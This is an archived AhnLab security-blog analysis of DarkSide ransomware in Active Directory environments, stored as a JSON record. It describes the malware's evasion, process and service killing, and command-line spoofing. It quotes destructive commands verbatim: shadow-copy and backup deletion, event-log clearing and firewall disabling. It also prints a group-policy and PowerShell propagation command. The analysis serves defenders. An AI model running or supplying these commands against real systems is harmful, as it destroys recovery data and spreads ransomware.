{
	"id": "d855812c-9068-4bbc-8ca6-e3efc5e61102",
	"created_at": "2026-04-06T00:21:53.177161Z",
	"updated_at": "2026-04-10T03:20:05.545611Z",
	"deleted_at": null,
	"sha1_hash": "bf45ca88acea6e7ff509ad47695c019f46978bbf",
	"title": "DarkSide Ransomware With Self-Propagating Feature in AD Environments",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2838934,
	"plain_text": "DarkSide Ransomware With Self-Propagating Feature in AD\r\nEnvironments\r\nBy ATCP\r\nPublished: 2023-02-06 · Archived: 2026-04-05 23:36:45 UTC\r\nIn order to evade analysis and sandbox detection, DarkSide ransomware only operates when the loader and data\r\nfile are both present. The loader with the name “msupdate64.exe” reads the “config.ini” data file within the same\r\npath that contains the encoded ransomware and runs the ransomware on the memory area of a normal process. The\r\nransomware is structured to only operate when a specific argument matches. It will then register itself to the task\r\nscheduler and run itself periodically.\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 1 of 15\n\nFigure 1. Ransomware operation method\r\nThe following are the features of DarkSide ransomware.\r\n1) Ransomware Encryption Target Exception List\r\nAfter being injected into a normal process, the ransomware encrypts all files aside from those with certain folder\r\nand file names. Table 1 and 2 contains the folder paths and filenames excluded from the encryption.\r\nFolder Paths Excluded From Encryption\r\n“AppData”\r\n“Boot”\r\n“Windows”\r\n“WINDOWS”\r\n“Windows.old”\r\n“Ahnlab”\r\n“Tor Browser”\r\n“Internet Explorer”\r\n“Google”\r\n“Opera”\r\n“Opera Software”\r\n“Mozilla”\r\n“Mozilla Firefox”\r\n“$Recycle.Bin”\r\n“ProgramData”\r\n“All Users”\r\n“Program Files”\r\n“Program Files (x86)”\r\n“#recycle”\r\n“..”\r\n“.”\r\n“SYSVOL”\r\n“bootmgr”\r\n“ntldr”\r\nTable 1. List of folder paths excluded from encryption\r\nFilenames Excluded From Encryption\r\n“autorun.inf”\r\n“boot.ini”\r\n“bootfont.bin”\r\n“bootsect.bak”\r\n“bootmgr.efi”\r\n“bootmgfw.efi”\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 2 of 15\n\n“desktop.ini”\r\n“iconcache.db”\r\n“ntuser.dat”\r\n“ntuser.dat.log”\r\n“ntuser.ini”\r\n“thumbs.db”\r\n“AUTOEXEC.BAT”\r\n“autoexec.bat”\r\n“bootfont.bin”\r\n“bootfont.bin”\r\n“ntldr”\r\n“config.ini”\r\n“begin.txt”\r\n“finish.txt”\r\nTable 2. List of filenames excluded from encryption\r\n2) Force Terminate Running Processes\r\nThe ransomware terminates running processes in order to prevent file-handling conflicts during the encryption\r\nprocess. The following is a list of those targets.\r\nForce Terminated Processes\r\n“sql.exe”\r\n“oracle.exe”\r\n“ocssd.exe”\r\n“dbsnmp.exe”\r\n“synctime.exe”\r\n“agntsvc.exe”\r\n“isqlplussvc.exe”\r\n“xfssvccon.exe”\r\n“mydesktopservice.exe”\r\n“ocautoupds.exe”\r\n“encsvc.exe”\r\n“firefox.exe”\r\n“tbirdconfig.exe”\r\n“mydesktopqos.exe”\r\n“ocomm.exe”\r\n“dbeng50.exe”\r\n“sqbcoreservice.exe”\r\n“excel.exe”\r\n“infopath.exe”\r\n“msaccess.exe”\r\n“mspub.exe”\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 3 of 15\n\n“onenote.exe”\r\n“outlook.exe”\r\n“powerpnt.exe”\r\n“steam.exe”\r\n“thebat.exe”\r\n“thunderbird.exe”\r\n“visio.exe”\r\n“winword.exe”\r\n“wordpad.exe”\r\n“wrapper.exe”\r\n“dbsrv12.exe”\r\n“WinSAT.exe”\r\nTable 3. List of processes to be force terminated\r\n3) Service Termination Targets\r\nThe ransomware closes backups and services related to AV products. Table 4 is a list of such targets.\r\nTerminated Services\r\nvss\r\nsql\r\nsvc$\r\nmemtas\r\nmepocs\r\nsophos\r\nbackup\r\nGxCIMgr\r\nDefWatch\r\nccEvtMgr\r\nccSetMgr\r\nSavRoam\r\nRTVscan\r\nQBFCService\r\nQBIDPService\r\nIntuit.QuickBooks.FCS\r\nQBCFMonitorService\r\nYooBackup\r\nzhudongfangyu\r\nstc_raw_agent\r\nVSNAPVSS\r\nVeeamTransportSvc\r\nVeeamDeploymentService\r\nVeeamNFSSvc\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 4 of 15\n\nPDVFSService\r\nBackupExecVSSProvider\r\nBackupExecAgentAccelerator\r\nBackupExecAgentBrowser\r\nBackupExecDiveciMediaService\r\nBackupExecJobEngine\r\nBackupExecManagementService\r\nBackupExecRPCService\r\nAcrSch2Svc\r\nAcronisAgent\r\nCASAD2DWebSvc\r\nCAARCUpdateSvc\r\nTable 4. List of services to be terminated\r\n4) Delete Volume Shadows, Suspend Windows Event Logging, and Deactivate Windows Recovery\r\nThe threat actor uses tools such as vssadmin.exe to perform acts like deleting volume shadow copies, but they\r\nmanage to bypass command line-based behavior detection by using the following method.\r\nEach process is run in SUSPEND mode, but garbage values like “11111111” are given as command line\r\narguments. Afterward, the address of the command line is obtained by reading the PEB from the corresponding\r\nprocess memory and finding the RTL_USER_PROCESS_PARAMETERS struct.\r\nFinally, by using WriteProcessMemory() to rewrite the actual command line argument in the obtained address,\r\ntools like vssadmin.exe can perform normally by using the newly transmitted argument.\r\nFigure 2. Original command line\r\nFigure 3. Command line argument being changed\r\nFigure 4. Changed command line argument\r\nProcess Execution Log Actual Command Line\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 5 of 15\n\nvssadmin.exe 11111111111111111111111111\r\nvssadmin.exe Delete Shadows\r\n/All /Quiet\r\nbcdedit.exe 111111111111111111111111111111111\r\nbcdedit.exe /set {default}\r\nrecoveryenabled No\r\nbcdedit.exe\r\n1111111111111111111111111111111111111111111111111\r\nbcdedit.exe /set {default}\r\nbootstatuspolicy ignoreallfailures\r\nwbadmin.exe 111111111111111111111111\r\nwbadmin.exe DELETE\r\nSYSTEMSTATEBACKUP\r\nwbadmin.exe 11111111111111111111111111111111111111\r\nwbadmin.exe DELETE\r\nSYSTEMSTATEBACKUP -\r\ndeleteOldest\r\nwbadmin.exe 111111111111111111111\r\nwbadmin.exe delete catalog -\r\nquiet\r\nwbadmin.exe 1111111111111 wbadmin.exe delete backup\r\nwbadmin.exe\r\n1111111111111111111111111111111111111111\r\nwbadmin.exe delete\r\nsystemstatebackup -\r\nkeepversions:0\r\nwevtutil.exe 111111111111111111111\r\nwevtutil.exe clear-log\r\nApplication\r\nwevtutil.exe 111111111111111111 wevtutil.exe clear-log Security\r\nwevtutil.exe 1111111111111111 wevtutil.exe clear-log System\r\nwevtutil.exe 111111111111111111111111111111\r\nwevtutil.exe clear-log “windows\r\npowershell”\r\nwmic.exe 1111111111111111111111111\r\nwmic.exe SHADOWCOPY\r\n/nointeractive\r\nnet.exe 1111111111 net.exe stop MSDTC\r\nnet.exe 1111111111111111111\r\nnet.exe stop\r\nSQLSERVERAGENT\r\nnet.exe 1111111111111111 net.exe stop MSSQLSERVER\r\nnet.exe 11111111 net.exe stop stop vds\r\nnet.exe 11111111111111 net.exe stop SQLWriter\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 6 of 15\n\nnet.exe 111111111111111 net.exe stop SQLBrowser\r\nnet.exe 1111111111111111 net.exe stop MSSQLSERVER\r\nnet.exe 1111111111111111111\r\nnet.exe stop\r\nMSSQL$CONTOSO1\r\nnetsh.exe 1111111111111111111111111111111111111111\r\nnetsh.exe advfirewall set\r\ncurrentprofile state off\r\nnetsh.exe 11111111111111111111111111111111\r\nnetsh.exe firewall set opmode\r\nmode=disable\r\nTable 5. Actually executed command lines\r\nFigure 5. AhnLab EDR detecting abnormal process executions from Table 5\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 7 of 15\n\nFigure 6. AhnLab MDS detecting execution and data written in memories\r\nThe AhnLab EDR/MDS line of products considers executions like the ones above as abnormal executions. MDS\r\nproducts can also check the data that’s written on target process memories.\r\nWritten data\r\n76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c\r\n00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00\r\n6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 00\r\nWhat command the above data means\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nTable 6. Command written in the memory\r\n5) Ransom Note and File Encryption Extension\r\nThe ransomware generates a ransom note file called “_r_e_a_d_m_e.txt”, like the one shown in Figure 7, in each\r\nencrypted folder.\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 8 of 15\n\nFigure 7. Ransom note\r\nAdditionally, the ransomware changes the extension format of encrypted files to “.s1s2s3[number of encrypted\r\nfiles]”.\r\n 6) Self-deleting Ransomware\r\nAfter the ransomware finishes its actions, it attempts to delete itself through the following command.\r\nSelf-deletion Command\r\n“C:\\Windows\\System32\\cmd.exe” /c ping 127.0.0.1 -n 3 \u0026\u0026 del /f/q\r\n“C:\\Users\\Default\\Desktop\\msupdate64.exe”\r\nTable 7. Self-deletion command\r\nFigure 8. AhnLab MDS detecting self-deletion command\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 9 of 15\n\nFigure 9. AhnLab EDR detecting self-deletion command\r\nInternal Propagation (Ransomware Distribution Method Through Domain Controller)\r\nWhen this ransomware becomes active on the domain controller of an AD server, it creates a group policy as\r\nshown in Figure 9 to distribute the ransomware to other PCs linked to the current domain.\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 10 of 15\n\nFigure 10. Ransomware distribution method through domain controller\r\nTable 8 shows a file-related group policy which gives the command to copy the executable file within the\r\nransomware’s domain controller to the desktops of infected PCs with the name format “[Distribution\r\nDate]_[Ransomware Filename].exe”.\r\n{D6C45CD3-BCB9-4D6C-A16C-FD416DAA1C47}\\User\\Preferences\\Files\\Files.xml\r\n\u003c?xml version=”1.0″ encoding=”utf-8″?\u003e\r\n\u003cFiles clsid=”{215B2E53-57CE-475c-80FE-9EEC14635851}”\u003e\u003cFile clsid=”{50BE44C8-\r\n567A-4ed1-B1D0-9234FE1F38AF}” name=”[Distributed Date][Ransomware Filename].exe”\r\nstatus=”[Distribution Date][Ransomware Filename].exe” image=”2″ changed=”[Distribution\r\nDate]” uid=”{1F86D6A8-6640-47D8-A26B-E263CAECE394}” bypassErrors=”1″\u003e\r\nTable 8. Group policy that generates ransomware executable file\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 11 of 15\n\nFigure 11. AhnLab EDR detecting the execution of ransomware generated through a group policy\r\nDarkSide will not operate if a certain argument to prevent replication and analysis does not match. However, as\r\nshown in Figure 10, AhnLab EDR detects ransomware strains generated through group policies in AD\r\nenvironments. It is also possible to check the arguments at the point of execution.\r\nFor continuous propagation, the ransomware distributes group policies with the following command.\r\nPowerShell command\r\n powershell.exe -Command “Get-ADComputer -filter * -Searchbase ‘DC=ahnlabs,DC=com’ |\r\nforeach{ Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0}”\r\nTable 9. Propagation command\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 12 of 15\n\nFigure 12. AhnLab EDR detecting the distribution of group policies using PowerShell\r\nThe threat actor that performs an ATP attack on the AD environments of companies for monetary gain distributes\r\ntheir malware after checking the detection of all AV products based on existing signatures.\r\nFigure 13. DarkSide ransomware not found by VirusTotal\r\nAs shown in the above Figure 13, there is a great chance that DarkSide ransomware can evade being detected by\r\nAV products based on existing signatures since it cannot be collected by even VirusTotal.\r\nThe importance of an APT detection solution like MDS and EDR, which records and reports all suspicious\r\nbehaviors in endpoints, becomes clear when it comes to trying to detect this threat effectively.\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 13 of 15\n\nFigure 14. DarkSide ransomware detected on AhnLab MDS\r\nFigure 15. DarkSide ransomware detected on AhnLab EDR\r\nDarkSide ransomware attacks correspond to the following techniques in the MITRE ATT\u0026CK framework.\r\nT1486 Data Encrypted for Impact[1]\r\nT1484.001 Domain Policy Modification: Group Policy Modification[2]\r\nT1053.005 Scheduled Task/Job: Scheduled Task[3]\r\nT1562.001 Impair Defenses: Disable or Modify Tools or T1489 Service Stop[4]\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 14 of 15\n\nT1489 Service Stop[5]\r\nT1021.002 Remote Services: SMB/Windows Admin Shares[6]\r\nT1562.001 Impair Defenses: Disable or Modify Tools[7]\r\nSubscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC\r\nand detailed analysis information.\r\nSource: https://asec.ahnlab.com/en/47174/\r\nhttps://asec.ahnlab.com/en/47174/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/47174/"
	],
	"report_names": [
		"47174"
	],
	"threat_actors": [],
	"ts_created_at": 1775434913,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bf45ca88acea6e7ff509ad47695c019f46978bbf.pdf",
		"text": "https://archive.orkl.eu/bf45ca88acea6e7ff509ad47695c019f46978bbf.txt",
		"img": "https://archive.orkl.eu/bf45ca88acea6e7ff509ad47695c019f46978bbf.jpg"
	}
}